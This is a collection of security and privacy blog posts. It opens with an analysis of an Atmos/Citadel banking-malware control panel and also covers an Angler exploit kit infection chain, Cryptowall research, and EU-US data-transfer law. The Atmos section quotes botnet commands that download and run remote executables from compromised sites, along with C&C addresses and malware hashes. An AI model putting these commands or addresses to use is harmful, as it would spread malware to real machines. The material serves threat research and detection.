user_execute htxp://mareikes.com/wp-includes/pomo/server.exe
user_execute htxp://mareikes.com/wp-includes/pomo/ammy.exe
user_execute http://tehnoart.co/sr.exe -f
user_execute http://3dmaxkursum.net/tmp/sys/config.exe
user_execute http://coasttransit.com/wp-content/gallery/gulfport-transit-center/thumbs/htasees.exe
• dns: 1 ›› ip: 185.4.73.33 - adress: IGUANA58.RU
• dns: 1 ›› ip: 176.9.24.49 - adress: MAREIKES.COM
• dns: 1 ›› ip: 107.180.26.93 - adress: TEHNOART.CO
• dns: 1 ›› ip: 94.73.144.210 - adress: 3DMAXKURSUM.NET
• dns: 1 ›› ip: 184.168.47.225 - adress: COASTTRANSIT.COM


Socks:

VNC:

Example of infected endpoints:


Config:

Backconnect logs:

Files:

SHA1: 9EA4041C41C3448E5A9D00EEA9DACB9E11EBA6C0

bcservice.ini:
[bcservice]
client_starting_port=200
bots_port=30
reboot_every_m=10

Trashed binnaries:

SHA1: 987B468DB8AA400171E5365E89C3120F13F728EE

Atmos builder:
 SHA1: D3F992DCDBB0DF54C4A383163172F69A1CA967AE

Server logs start the 3 oct 2015:

TokenSpy:

With a nice ring animation :)

Rule/test:

 Search database:
 Search list:

Setup:
With a reference to citadel.

Report:

Favorite reports:

Search in files:

Screenshot:

View videos:

CMD parser:

Neuromodel:

Edit:


Links:

Balance grabber:
Config:
Activity:

Jabber notifier:

Notes:

Crypt exe:

FTP iframer:
Config:

Iframe lead on a Keitaros TDS who lead on malware:

That right, second one is a blackhole exploit kit.

Jérôme Segura of MalwareBytes have wrote about this one here: https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/
First one is RIG exploit kit delivering Chthonic targeting Russia and Ukraine.
And for update-flashplayer.ml, update-flash-security.ml, they lead to iBanking download.
SHA1: E536E23409EBF015C500D5799AD8C70787125E95

CNC at templatehtml.ru

To get back on the original subject, here is the File hunter:


Downloaded:
Trash:

Mailer:
Config:

Mail:


Informations:

Options:
Jabber adress:

User:

Users:

Different admins with different rights:
Some users have limited actions, for exemple one guys had only access to malware upload feature, probably to refresh the crypt.
6 users including the master user is using russian language on the panel, the rest is configured on english language.

Install:



Files:

CC parser:

Webinject server:

Dashboard:

View:

Settings:

Replacer settings:

Chat:

Drop:

Fakes:

WebInject server 2:

Dashboard:

Command:

Logs:

Cash list:

Stats:

Drops:

State stats:

User management:

Export CSV:

Help:

/s/ panel:

Show infos:

State stats:


Help:

/s2/ panel:

/s3/ panel:

Pony used by one member of the gang:
Browser logs:

Citadel 0.0.1.1 samples:
A7D98B79FBDD7EFEBE4945F362D8A233A84D0E8D
C286C31ECC7119DD332F2462C75403D36951D79F
D399AEDA9670073E522B17B37201A1116F7D2B94
BFD9251E135D63F429641804C9A52568A83831CA
2E28E9ACAC691A40B8FAF5A95B9C92AF0947726F
5CAC9972BB247502E700735067B3A37E70C90278
959F8A78868FFE89CD4A0FD6F92D781085584E95
2716D3DE18616DBAB4B159BACE2F2285DA358C84
450A638957147A62CA9049830C3452B703875AEE
7C90F27C0640188EA5CF2498BF5964FF6788E79C
14C0728175B26446B7F140035612E303C15502CB
267DA16EC9B114ED5D9F5DEE07C2BF77D4CFD5E6
E6DD260168D6B1B29A03DF1BA875C9065B146CF3
963FE9DCEDA3A4552FAA88BABD4E9954B05C83D2
4F6AE5803C2C3EE49D11DAB48CA848F82AE31C16
8BBFA46A2ADCDF0933876EF920826AB0B02FCC18

Decrypted Citadel plugins:
B3FDC0DAFA7C0A2076AB4D42317A0E0BAAF3BA78
0B40F80C025C199F7D940BED572EA08ADE2D52F9
3B004C68C32C13CAF7F9519B6F7868BF99771F30
Hidden VNC demo: https://www.youtube.com/watch?v=TDOZfalD_LY

Atmos package:
056709A96FE05793B3544ACB4413A9EF827DCEEF
C1B79552B6F770D96B0A0C25C8C8FD87D6D629B9

Other samples (not Atmos):
02FFC98E2B5495E9C760BDA1D855DCA48A754243
B7AE6D5026C776F123BFC9DAECC07BD872C927B4
56B58A03ADB175886FBCA449CDB73BE2A82D6FEF

Some other atmos sample (Courtesy of Kafeine):
8BBFA46A2ADCDF0933876EF920826AB0B02FCC18
DAABF498242018E3EE16513E2A789D397141C7AC
04F599D501EA656FB995D1BFA4367F5939631881

You can find my yara rules for mitigating Atmos here: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar
The Google Chrome injections appear to work from v25.0.1349.2 (2012/12/06), till v43.0.2357.134 (2015/07/14)

Fun thing: I got correlations with a CoreBot sample and their webinjects used.
ch_new, wf2, cu_main, citi_new, ebay_new, [...]
Same kind of campaign inside their panels and same custom file names.

if you look for more infos about Citadel, the community did a great work here http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1465

継続は力なり

Department of Homeland Security Issues Procedures Regarding Sharing Cybersecurity Information

On February 16, 2016, the Department of Homeland Security (“DHS”), in collaboration with other federal agencies, released a series of documents outlining procedures for both federal and non-federal entities to share and disseminate cybersecurity information. These documents were released as directed by the Cybersecurity Act of 2015 (the “Act”), signed into law on December 18, 2015. The Act outlines a means by which the private sector may enjoy protection from civil liability when sharing certain cybersecurity information with the federal government and private entities. These documents represent the first steps by the executive branch to implement the Act.

The Act directs additional actions to occur throughout the spring and early summer, and into the coming years. Notably, the Act directs DHS to certify to Congress a capability within DHS to receive cybersecurity information by March 2016, which will become the primary portal through which the federal government receives cybersecurity information under the Act. According to DHS, the Department’s Automated Information Sharing initiative will be that principal mechanism. However, the Act also states that at “any time after” DHS certifies this capability, the President can designate a non-DoD agency to also receive cybersecurity information under the Act.

Angler Exploit Kit to TeslaCrypt

There's an excellent write up by Brad Duncan in the Internet Storm Center's Handler Diaries on analyzing a compromise that used the Angler Exploit Kit to deliver TeslaCrypt.

From the article:

On Wednesday 2016-02-17 at approximately 18:14 UTC, I got a full chain of events.

The chain started with a compromised website that generated an admedia gate.

The gate led to Angler EK.

Finally, Angler EK delivered TeslaCrypt, and we saw some callback traffic from the malware.

·         178.62.122.211 - img.belayamorda.info - admedia gate
·         185.46.11.113 - ssd.summerspellman.com - Angler EK
·         192.185.39.64 - clothdiapersexpert.com - TeslaCrypt callback traffic

 Full write up is here.

Some of the obfuscation may seem daunting, but there's a wealth of information on techniques to deobfuscate Javascript and other code. A lot of that information is in the Handlers Diaries itself. Here's some other write ups from the ISC:


And from other sites:



Security Weekly #451 – Mike Strouse, CEO of ProXPN

This week on Security Weekly, we introduce Mike Strouse who is the CEO of ProXPN. He explains how he got started in ProXPN and more!

 

Security News of the week talks about:

  1. 5 Big Incident Response Mistakes
  2. D-Link DSL-2750B Remote Command Execution
  3. ASUS Router Administrative Interface Exposure
  4. A theory? - From a discussion at work I’d love some feedback on. Mass deployments of crypto locker using compromised crews, why the increase? Some thoughts: After OPM breach Chinese sponsored mercenaries are out of work and are now looking to pay the bills with resources that nation states don’t seem to care about. Mistakes get made, and things get tracked to weird places but who cares? Another thought is, maybe nation states are willing to share information, as some of them have more than enough date for the time being, so spreading the love with other compromised hosts and those other nations don't have the same agenda; pain and profit versus information gathering
  5. Power Grid Honeypot Puts Face on Attacks

Surcuri Labs Hex Decoder

Sucuri has a nice decoder page at http://ddecode.com/hexdecoder/ that might help if you're having trouble figuring mixed forms of obfuscation. Even if it can't completely decode the segment, it may be able to deobfuscate it enough to give you a sense of what the code is doing.

Article 29 Working Party Issues Statement on 2016 Action Plan for Regulation

On February 11, 2016, the Article 29 Working Party (the “Working Party”) issued a statement on the 2016 action plan for the implementation of the EU General Data Protection Regulation (the “Regulation”). The action plan outlines the priorities for the Working Party in light of the transition to a new legal framework in Europe and the introduction of the European Data Protection Board (the “EDPB”). Accompanying the statement is a document, Work Program 2016-2018, detailing the tasks of the Working Party’s subgroups during the transitional period between the adoption of the Regulation and its implementation.

Action Plan Based on Four Priorities

The 2016 action plan sets out four priorities for the Working Party:

  • Setting up the EDPB structure and its administration. The Working Party will work together with the European Data Protection Supervisor on establishing human resources, a budget and future procedures of the EDPB. In addition, the development of IT systems for the EDPB will be a crucial step in the context of the One-Stop-Shop, according to the Working Party.
  • Preparing the One-Stop-Shop and the consistency mechanism. To help prepare for the One-Stop-Shop, the Working Party recognizes in the action plan that development is necessary in several areas, such as the designation of a lead DPA, enforcement cooperation and the EDPB consistency mechanism.
  • Issuing guidance for data controllers and processors. The Working Party will provide guidance to assist data controllers and processors in their preparation for the Regulation, specifically on topics such as the new right to portability, the notions of “high risk” and “Data Protection Impact Assessment,” and data protection officers.
  • Communication around the EDPB and the Regulation. An important task of the 2016 action plan will be to provide visibility to the EDPB by creating an online communication tool, as well as strengthening the relationships between the EU institutions and participating in external events to promote the new governance model.

Work Program of the Working Party Subgroups

The subgroups of the Working Party will continue their work, taking into account the transitional period before the implementation of the Regulation, and anticipating, to the extent possible, the application of this new legal framework. Among these tasks, the International Transfers subgroup will continue analyzing the impact of the ruling of the Court of Justice of the European Union in the Schrems case, invalidating the Safe Harbor framework, has on other international data transfer mechanisms (i.e., Standard Contractual Clauses and Binding Corporate Rules). In addition, the subgroup will examine and deliver an opinion on the EU-U.S. Privacy Shield once it has been released, and will also analyze the impact of the Regulation on existing international data transfers mechanisms. The Key Provisions subgroup will analyze the need to update existing opinions of the Working Party and will work on the interpretation of key concepts of the Regulation.

The 2016 action plan will be reviewed periodically and complemented in 2017. Read the full Work Program 2016-2018 for more details on the tasks of each of the eight Working Party’s subgroups.

Congress Passes Judicial Redress Act

On February 10, 2016, the U.S. House of Representatives passed the Judicial Redress Act, which had been approved by the Senate the night before and included a recent Senate amendment. The House of Representatives previously passed the original bill in October 2015, but the bill was sent back to the House due to the recent Senate amendment. The Judicial Redress Act grants non-U.S. citizens certain rights, including a private right of action for alleged privacy violations that occur in the U.S. The amendment limits the right to sue to only those citizens of countries that (1) permit the “transfer of personal data for commercial purposes” to the U.S., and (2) do not impose personal data transfer policies that “materially impede” U.S. national security interests. The bill now heads to President Obama to sign.

The passing of the Judicial Redress Act is an important step that may help facilitate the approval of the new EU-U.S. Privacy Shield by European regulators. It also impacts the 2015 draft agreement known as the Protection of Personal Information Relating to the Prevention, Investigation, Detection and Prosecution of Criminal Offenses (the “Umbrella Agreement”). The Umbrella Agreement was conditioned on the passing of the Judicial Redress Act.

In addition to the private right of action, non-U.S. citizens have other rights that are granted to U.S. citizens under the Privacy Act of 1974. These include the right to request access to records shared by their governments with a U.S. federal agency in the course of a criminal investigation and to amend any inaccuracies in their records.

The Judicial Redress Act has been endorsed by the U.S. Chamber of Commerce and numerous prominent technology companies, and had strong bi-partisan support.

Update: On February 24, 2016, President Obama signed the Judicial Redress Act into law.

2015 Reported Data Breaches Surpasses All Previous Years

Risk Based Security has released the Data Breach QuickView report that shows 2015 broke the previous all-time record, set back in 2012, for the number of reported data breach incidents. The 3,930 incidents reported during 2015 exposed over 736 million records.

Although overshadowed by the more than one billion records exposed in the two previous years, 2015 also ranks #3 in total reported exposed records.

The 2015 Data Breach QuickView report shows that 77.7% of reported incidents were the result of external agents or activity outside the organization with hacking accounting for 64.6% of incidents and 58.7% of exposed records. Incidents involving U.S. entities accounted for 40.5% of the incidents reported and 64.7% of the records exposed.

The report also revealed that individuals’ email addresses, passwords and user names were exposed in 38% of reported incidents, with passwords taking the top spot at 49.9% of all 2015 breaches. This is especially troubling since a high percentage of users pick a single password and use it on all their accounts both personal and work related.

You can get your free copy of 2015 Data Breach QuickView report here: http://www.riskbasedsecurity.com/2015-data-breach-quickview/

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

Cryptowall son of Borracho (Flimrans) ?


Lately I received multiple questions about connection between Reveton and Cryptowall.
I decided to have a look.

A search in ET Intelligence portal at domains from Yonathan's Cryptowall Tracker

ET Intelligence search on Specspa .com
show that the first sample ET has talking with it is :
e2f4bb542ea47e8928be877bb442df1b  2013-10-20

A look at the http connexion shows the "us.bin" call mentioned by Yonathan (btw the us.bin item is still live there)

ET Intelligence  : e2f4bb542ea47e8928be877bb442df1b http connexions
ET Intelligence : Associated alert pointing at Cryptowall.

A look into VirusTotal Intelligence shows that this sample is available in a Pcap captured and shared by ThreatGlass :

NSFW://www.threatglass .com/malicious_urls/sunporno-com


Himan EK dropping Cryptowall 2013-10-20
captured by ThreatGlass

With the same referer and in the same Exploit Kit i got dropped 20 days earlier Flimrans :
(See : http://malware.dontneedcoffee.com/2013/10/HiMan.html )

Flimrans disappeared soon after this post from 2013-10-08 about the affiliate :
http://malware.dontneedcoffee.com/2013/10/flimrans-affiliate-borracho.html

Interestingly Flimrans is showing in US the same Design from Reveton pointed by Yonathan :

Flimrans US 2013-10-03

What is worth mentioning is that Flimrans was the only ransomware (i am aware of) to show a Spanish version of this same design :

Flimrans ES 2013-10-03

The timeline is also inline with a link between those two Ransomware (whereas Reveton was still being distributed months after these events).

Digging into my notes/fiddlers i even found that this bworldonline .com which is still hosting the us.bin was in fact also the redirector to HiMan dropping Flimrans 20 days earlier from same sunporno upper.
[The credits goes to Eoin Miller who at that time pointed that infection path allowing me to replay it]

The compromised server storing the first design Blob used by cryptowall
used to redirect 20 days earlier to Himan dropping Flimrans (which is using that same design).




So...Cryptowall son of Borracho? I don't know for sure...but that could to be a possibility.

Files : Items mentionned here. (password is malware)

Read More:
HiMan Exploit Kit. Say Hi to one more - 2013-10-02
Flimrans Affiliate : Borracho - 2013-10-08




Will you pay 300$ and allow scamsters remote control to your computer ! child play for this BPO

Microsoft customers in Arizona were scammed by a BPO setup by fraudsters who’s executives represented themselves as Microsoft employees and managed to convince them that for a 300$ charge they would enhance the performance of their desktop computers. 

Once signed up, the BPO technician logged onto using a remote access software that provided full remote control over the desktop and proceeded to delete the trash and cache file, sometimes scanning for personal information. The unsuspecting customer ended up with a marginal improvement in performance. After one year of operation, the Indian police nabbed the three men behind the operation and eleven of their employees.

There were several aspects to this case “Pune BPO which cheated Microsoft Clients in the US busted” that I found interesting:

1)    The ease with which customers were convinced to part with money and to allow an unknown third party to take remote control over their computer. With remote control one can also install malicious files to act as remote backdoor or spyware making the machine vulnerable.
2)    The criminals had in their possession a list of 1 million Microsoft customers with updated contact information
3)    The good fortune that the Indian government is unsympathetic to cybercrime both within and outside their shores which resulted in the arrests. In certain other countries crimes like these continue unhindered.

Cybercitizens should ensure that they do not surrender remote access to their computers or install software unless they come from trusted sources.


President Obama Signs Executive Order Establishing Federal Privacy Council

On February 9, 2016, President Obama signed an Executive Order establishing a permanent Federal Privacy Council (“Privacy Council”) that will serve as the principal interagency support structure to improve the privacy practices of government agencies and entities working on their behalf. The Privacy Council is charged with building on existing interagency efforts to protect privacy and provide expertise and assistance to government agencies, expand the skill and career development opportunities of agency privacy professionals, improve the management of agency privacy programs, and promote collaboration between and among agency privacy professionals.

Below is a summary of the key components of the Executive Order:

  • Within 120 days of the date of the Executive Order, the Director of the Office of Management and Budget (“OMB”) shall issue a revised policy that contains guidance on the roles and responsibilities, and appropriate expertise and resource levels, of Senior Agency Officials for Privacy.
  • The Privacy Council will be established as the principal interagency forum to help Senior Agency Officials for Privacy “better coordinate and collaborate, educate the federal workforce, and exchange best practices.” The Privacy Council will be chaired by the Deputy Director for Management of the OMB and will include Senior Agency Officials from numerous agencies such as the Departments of State, Treasury, Commerce, Defense and Justice.
  • The head of each agency will designate (or re-designate) a Senior Agency Official for Privacy “with the experience and skills necessary to manage an agency-wide privacy program” who will work with the Privacy Council.
  • The Privacy Council will (1) develop recommendations for OMB on federal government privacy policies and requirements; (2) coordinate and share best practices for protecting privacy and implementing appropriate safeguards; (3) help address hiring, training and professional development needs of the federal government from a privacy perspective; and (4) perform other privacy-related functions designated by the Chair.
  • The Chair and the Federal Privacy Council will coordinate with the Federal Chief Information Officers Council to promote consistency and efficiency across the executive branch in addressing data privacy and security issues.

In parallel with the Executive Order, the White House issued a fact sheet regarding the Administration’s Cybersecurity National Action Plan (“CNAP”) which “takes near-term actions and puts in place a long-term strategy to enhance cybersecurity awareness and protections, protect privacy, maintain public safety as well as economic and national security, and empower Americans to take better control of their digital security.” The CNAP includes an action to modernize government information technology and transform how the government manages cybersecurity through the proposal of a $3.1 billion Information Technology Modernization Fund, which will include the formation of a Federal Chief Information Security Officer position. The fact sheet also details the establishment of the Commission on Enhancing National Security, which will be comprised of top U.S. strategic, business and technical thinkers from outside the government who will be tasked with studying and reporting on how to better enhance cybersecurity awareness and protect privacy. To fund the implementation of the proposed actions, the 2017 budget allocates more than $19 billion for cybersecurity, which represents a 35% increase over the 2016 enacted level.

Read more about the Administration’s proposed cybersecurity and data privacy initiatives.

Administrative Law Judge Orders Health Care Provider to Pay HIPAA Civil Monetary Penalty

On February 3, 2016, the U.S. Department of Health and Human Services Office for Civil Rights (“OCR”) announced that an Administrative Law Judge (“ALJ”) ruled that Lincare, Inc. (“Lincare”) violated the HIPAA Privacy Rule and ordered the company to pay $239,800 to OCR.

Lincare, a health care provider, was investigated by OCR in 2009 after the ex-spouse of a Lincare employee discovered records in their home that contained the protected health information (“PHI”) of several hundred Lincare patients. OCR’s investigation revealed that the Lincare employee had improperly removed the PHI from Lincare’s facility and stored it in her vehicle as well as in her home. Lincare had failed to record or track the movements of the PHI and its privacy policy lacked any discussion of “safeguarding PHI that is taken off the premises of an operating center by an employee.” Additionally, the investigation found that Lincare regularly permitted employees to store PHI in their vehicles because many of their employees provided home health care services to patients. Finally, Lincare failed to take any corrective action once it learned of the incident that resulted in the complaint.

Taking into account all of these factors, OCR asserted in a Notice of Proposed Determination that Lincare committed three HIPAA Privacy Rule violations by (1) impermissibly disclosing PHI, (2) failing to reasonably safeguard PHI, and (3) neglecting to implement policies and procedures to comply with the HIPAA Privacy Rule’s requirements. Lincare appealed the Notice of Proposed Determination to the ALJ, claiming that it was not responsible for HIPAA violations because the complainant had stolen the PHI from the Lincare employee. The ALJ disagreed with Lincare’s assertion, noting in its decision that Lincare did not “provid[e] evidence to support its accusations” and that “the undisputed evidence establishes that Lincare violated HIPAA because it failed to safeguard the PHI of its patients.”

In announcing the ALJ’s decision, OCR Director Jocelyn Samuels noted that the office will “take the steps necessary, including litigation, to obtain adequate remedies for violations of the HIPAA Rules.” The ALJ’s decision is the second time in history that has sought a civil monetary penalty for HIPAA Privacy Rule violations – the first instance was a $4.3 million penalty against Cignet Health in 2011.

Three Must Do’s to make a Security Awareness Champion

Setting an example is the best way to institutionalize security awareness within a workplace or at home. Colleagues and children naturally follow examples set by champions as it makes it easy to mimic rather than spend time to self-learn. I found three important aspect to championing security awareness.

Be a role model

Cybercitizens champions take an active interest in being secure by keeping themselves updated and implementing security guidelines for the gadgets and services they use at home, for work and on the Internet. Knowledge on the do and don’ts of security for workplace system is normally obtained through corporate security awareness programs but for personal gadgets and services one needs to invest time to read the security guidelines provided by the service/product provider or on gadget blogs. Security guidelines provide information on the best practice to be used for secure configuration of gadgets, use of passwords, malware prevention and methods to erase data.  Besides security issues like password theft or loss of privacy, there is the possibility of becoming a victim of fraud when using ecommerce. Most ecommerce sites have a fraud awareness section to educate customers on the common types of frauds and on techniques to safeguard against them. Role models take pride in what they do and this passion becomes a source of motivation to others around them. A security champion delights on possessing detailed insights on how to use the best security features in gadgets (say mobile phones) or on recent security incidents.

Be a security buddy at your home

Telling people what to do to keep themselves secure online is difficult, primarily because security controls lower the user experience; as an example most people may prefer not to have a password or keep a simple one for ease of use. People tend to accept risk because they do not fully realize the consequences of a damaged reputation or the financial impact from the fraudulent use of credit cards until they or someone close, experiences its effects firsthand. Security champions act as security buddies at home. They take time to understand how their family members both young and old, use the Internet and to themselves learn about the safety, privacy and security issues related to those sites. Buddies perform the role of coaches, engaging in regular discussions on the use of these sites from a perspective of avoiding security pitfalls and the avoidance of risky behavior that may lead to unwanted attention from elements looking to groom children for sex or terrorism. Highlighting incidents of similar nature helps raise awareness of the reality of the risk.

Display commitment to security at your workplace

Small acts go a long way in promoting useful security behavior. A small security cartoon displayed on a work bench can immensely add to the corporate security awareness effort. Champions bring attention to the importance of security in business by bringing up security in routine business discussions; for example circulating insights into recent published security incident within a discussion group (leadership, business) and popping the security question “what if a customer security or privacy is affected” during project discussions.  

Article 29 Working Party Issues Statement on EU-U.S. Privacy Shield and Other Data Transfer Mechanisms

On February 3, 2016, the Article 29 Working Party (the “Working Party”) issued a statement on the consequences of the ruling of the Court of Justice of the European Union (the “CJEU”) in the Schrems case invalidating the European Commission’s Safe Harbor Decision.

The statement follows several weeks of analysis of the other data transfer mechanisms (i.e., the EU Standard Contractual Clauses and Binding Corporate Rules) in light of the CJEU’s judgment, as well as the assessment of the current legal framework, practices of U.S. intelligence services and the conditions under which it allows interferences to the EU right of privacy and data protection.

Four Essential Guarantees for Intelligence Activities

The assessment of the Working Party is based on four essential guarantees, arising from European case law on fundamental rights:

  • The processing of personal data should be based on clear, precise and accessible rules, that allow individuals to understand the locations where their data is transferred.
  • The necessity and proportionality of the processing and transfer of personal data must be demonstrated. A balance should be found between the rights of individuals and the purposes for which data are collected and accessed in the context of national security.
  • An effective, impartial and independent oversight mechanism should exist to monitor the collection of and access to personal data.
  • Individuals must have access to effective remedies to defend their rights.

These four guarantees must be respected when transferring personal data not only to the U.S., but also to other third countries, as well as to EU Member States.

Assessment of EU-U.S. Privacy Shield

The Working Party states that it still has concerns that the U.S. legal framework does not meet the four guarantees identified above and in particular, with regard to the scope and remedies available to individuals.

The Working Party will therefore analyze the agreement that has been reached between the European Commission and the U.S., and assess whether the EU-U.S. Privacy Shield satisfies the Working Party’s four concerns with respect to intelligence activities. In addition, the Working Party also will assess whether this new arrangement provides legal certainty for the other data transfer mechanisms.

The Working Party stated that, in any event, transfers of personal data to the U.S. may no longer take place on the basis of the invalidated Safe Harbor Decision. In the meantime, companies may still rely on the other data transfer mechanisms. However, national data protection authorities will handle any related cases and complaints on a case-by-case basis.

Next Steps and Timing

The Working Party asked the European Commission to deliver all documents on the EU-U.S. Privacy Shield to the Working Party by the end of February. An extraordinary plenary meeting of the Working Party will then be organized around the end of March. After this, the Working Party will consider whether the other data transfer mechanisms are still valid for transfers of personal data to the U.S. According to the Chair of the Working Party Isabelle Falque-Pierrotin, a final decision could be made by the end of April.

Plaintiffs Survive Motion to Dismiss in Remanded Data Breach Litigation

A federal judge of the U.S. District Court for the Northern District of Illinois denied Neiman Marcus’ motion to dismiss in Remijas et al. v. Neiman Marcus Group, LLC, 1:14-cv-01735.  As we previously reported, the Seventh Circuit reversed Judge James B. Zagel’s earlier decision dismissing the class action complaint based on Article III standing. At that time the Seventh Circuit declined to analyze dismissal under Federal Rule of Civil Procedure 12(b)(6) due to, among other reasons, the district court’s focus on standing.

After remand, the parties’ supplemental dismissal briefing addressed whether the plaintiffs pleaded sufficient facts to plausibly establish causation and injury. Judge Zagel simply stated in a docket entry that dismissal was “not appropriate at this time.”

New Deal Between EU and U.S. Reached Regarding Transatlantic Data Transfers

On February 2, 2016, a new EU-U.S. transatlantic data transfer agreement was reached. Věra Jourová, European Commissioner for Justice, Consumers and Gender Equality, presented the new agreement to the European Commission (the “Commission”) today. According to the Commission’s press release, the new agreement will be called the EU-U.S. Privacy Shield.

According to Commissioner Jourová, “[t]he new EU-US Privacy Shield will protect the fundamental rights of Europeans when their personal data is transferred to U.S. companies. For the first time ever, the United States has given the EU binding assurances that the access of public authorities for national security purposes will be subject to clear limitations, safeguards and oversight mechanisms. Also for the first time, EU citizens will benefit from redress mechanisms in this area. In the context of the negotiations for this agreement, the U.S. has assured that it does not conduct mass or indiscriminate surveillance of Europeans. We have established an annual joint review in order to closely monitor the implementation of these commitments.”

As we previously reported on February 1, Jourová told the European Parliament that a new agreement had not yet been reached. Jourová indicated that an agreement was close, but additional work was needed to finalize it.

The EU-U.S. Privacy Shield comes in the wake of the Article 29 Working Party announcement in October 2015 that if no agreement was reached by the end of January 2016, the individual national data protection authorities may decide to take coordinated enforcement actions against companies that continue to rely on the invalidated Safe Harbor agreement to transfer data.

Next Steps

According to the Commission’s press release, the College of Commissioners (the “College”) has mandated that Vice President Ansip and Commissioner Jourová  prepare a draft “adequacy decision” in the coming weeks, which could then be adopted by the College after obtaining the advice of the Article 29 Working Party and after consulting a committee composed of representatives of the EU Member States. The U.S. will also need to make the necessary preparations to put in place the new framework.

Safe Harbor Deal Between EU and U.S. Not Yet Reached as Negotiations Continue

On February 1, 2016, Věra Jourová, European Commissioner for Justice, Consumers and Gender Equality, told the European Parliament that an agreement on a new U.S.-EU Safe Harbor agreement has not yet been reached. Jourová indicated that an agreement is close, but additional work is needed to finalize it.

In her message to Parliament, Jourová indicated that any new Safe Harbor agreement would have to be fundamentally different from the original agreement and must be continually reviewed. She also indicated that any new agreement must also be able to withstand potential new legal challenges and provide businesses with legal certainty regarding their ability to transfer data to the U.S.

In addition, Jourová laid out four key issues that need to be addressed:

  1. Limits and Safeguards for Accessing Data – Access to data for national security purposes in the U.S. must be limited to what is strictly necessary and proportionate, and must not entail indiscriminate mass surveillance of EU citizens. The U.S. needs to provide specific written assurance regarding these issues, and any new agreement will need to put in place an annual joint review of these issues.
  2. Oversight and Redress – There needs to be independent oversight of adherence to any new agreement, and redress for EU citizens who feel that their data has been used for wrongful purposes. An ombudsperson must be put in place who can respond to individuals’ complaints with respect to overreach by national security authorities.
  3. Resolution of Individual Complaints – Companies should resolve individuals’ complaints regarding potential privacy violations. If a company cannot resolve the complaint, a third party, such as the Federal Trade Commission or another data protection authority (“DPA”), should resolve it free of charge. If such third parties cannot resolve the complaint, a last-resort mechanism must be put in place to ensure that all complaints are heard.
  4. Binding Commitment by the U.S. – The U.S.’s commitment to any new agreement must be formal and binding, and published in the Federal Register. Because the agreement will not technically be an international agreement, signatures at the highest level will be needed.

As we previously reported, the Article 29 Working Party announced in October 2015 that if no Safe Harbor agreement is reached by the end of January 2016, the individual national DPAs may decide to take coordinated enforcement actions against companies that continue to rely on the invalidated Safe Harbor agreement to transfer data. The Article 29 Working Party will meet in the coming days to discuss the ongoing negotiations and next steps.